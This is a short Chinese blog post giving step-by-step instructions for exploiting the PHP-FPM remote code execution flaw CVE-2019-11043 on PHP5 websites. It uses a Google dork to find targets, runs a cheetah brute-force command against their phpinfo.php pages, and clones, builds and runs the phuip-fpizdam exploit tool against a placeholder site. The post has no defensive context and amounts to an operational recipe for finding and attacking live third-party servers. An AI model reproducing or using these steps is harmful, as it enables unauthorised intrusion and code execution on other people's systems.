phuip-fpizdam php5版本漏洞利用和复现php-fpm (CVE-2019-11043)-泓源视野

phuip-fpizdam php5版本漏洞利用和复现php-fpm (CVE-2019-11043)

https://github.com/lvwuwei/phuip-fpizdam
可使用 cheetah暴力
python cheetah.py -u http://xxxx.com/phpinfo.php

使用google dork浏览器搜索inurl="phpinfo.php"
返回php5版本网站
使用go语言 下载最新版https://golang.org/dl/
wget https://golang.org/dl/go1.16.2.linux-amd64.tar.gz tar xvf go1.16.2.linux-amd64.tar.gz mv go /usr/local export PATH=$PATH:/usr/local/go/bin
然后
git clone https://github.com/lvwuwei/phuip-fpizdam
cd /phuip-fpizdam
go build
./phuip-fpizdam http://xxxx.com/xxx.php

本文由 泓源视野 作者:admin 发表,其版权均为 泓源视野 所有,文章内容系作者个人观点,不代表 泓源视野 对观点赞同或支持。如需转载,请注明文章来源。
27

发表评论

Protected with IP Blacklist CloudIP Blacklist Cloud
您是第8237847 位访客, 您的IP是:[3.236.86.184]